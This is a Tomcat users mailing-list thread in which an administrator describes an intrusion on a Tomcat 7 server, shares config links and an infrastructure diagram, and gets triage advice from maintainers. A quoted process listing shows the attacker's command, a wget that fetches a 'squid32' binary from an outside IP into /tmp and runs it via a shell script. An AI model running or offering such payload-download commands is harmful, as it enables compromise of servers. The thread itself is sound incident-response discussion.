Hello list, well my homework is done
Here are the links: setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm server.xml: http://pastebin.com/wfzE8bYU logging.properties: http://pastebin.com/Qurk8sLU catalina.properties: http://pastebin.com/jkfY1ZRQ tree + logsfiles: http://pastebin.com/j3tip4ij Note that logsfiles, are not the logfiles itsef but only a ls -lah (just for you to see the logsizes) A little more about the infraestructure i've mounted ill do some ascii art. internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7) Apache(2) is serving static content so haproxy(1) at the first level does http round robin balancing Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection) using mod_jk(3) Tomcat(5) are the main app server (the ones gets intruded) who uses tomcat(7) (solr service) using haproxy(6) using L4 connection. Versions: Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java: 1.6.0.41 [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version java version "1.6.0_41" Java(TM) SE Runtime Environment (build 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) OS: CentOS 5.8 64 bit [root@arcbaappvrt05 tomcat]# uname -a Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS release 5.8 (Final) [root@arcbaappvrt05 tomcat]# For now i havent see that the squid process whas launched so i couldnt do a dump Letme know if you need more information. BTW, pastebin links will work for one week. Kind regards, yours Saludos.- Leonardo Santagostini <http://ar.linkedin.com/in/santagostini> 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini <lsantagost...@gmail.com>: > Ok, i will do the following: > > 1) thread dump of running tomcat instance > 2) Pastebin the running tomcat config > > I think at mid day will have all the info. > > Thanks all for replying me and all the responses. > > Regards, Leonardo > > Saludos.- > Leonardo Santagostini > > <http://ar.linkedin.com/in/santagostini> > > > > > > 2014-04-30 10:55 GMT-03:00 Christopher Schultz < > ch...@christopherschultz.net>: > > -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA256 >> >> Konstantin, >> >> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: >> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini >> > <lsantagost...@gmail.com>: >> >> Hello Dan, >> >> >> >> Nop, the attacker is executing locally the following >> >> >> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh >> >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget >> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid >> >> >> >> And the launch squid who tries to connect via ssh to varoius >> >> places. >> >> >> >> Right now its time to leave the office, but in a few hours i will >> >> paste in pastebin access logs, config files, wherever you tell >> >> me. >> >> >> >> This is my pstree >> >> >> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd >> >> ├─java─┬─sh───wget │ └─263*[{java}] >> > >> > sh launched by tomcat's java? >> >> Yes: please verify that it's the JVM running Tomcat, and not just any >> JVM process. >> >> > Take a thread dump: >> > >> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F >> > >> > It shall show what is stacktrace in thread that launched external >> > process. >> >> +1 >> >> The only things that ship with Tomcat that call Process.exec() are the >> CGI servlet and SSI, both of which are disabled by default. So, either >> you have an insecure CGI/SSI configuration, your web application has a >> vulnerability, or you have deployed something like the Manager >> application and improperly-secured it. >> >> A classic example of such an intrusion might be that someone got a >> foothold elsewhere into your network, and the Manager web application >> is not properly secured with a password, etc. >> >> - -chris >> -----BEGIN PGP SIGNATURE----- >> Version: GnuPG v1 >> Comment: GPGTools - http://gpgtools.org >> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ >> >> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp >> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4 >> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC >> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o >> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr >> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS >> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj >> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb >> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W >> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7 >> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12 >> lvJcfOhzHLwo07Pv+y3J >> =EiX9 >> -----END PGP SIGNATURE----- >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org >> For additional commands, e-mail: users-h...@tomcat.apache.org >> >> >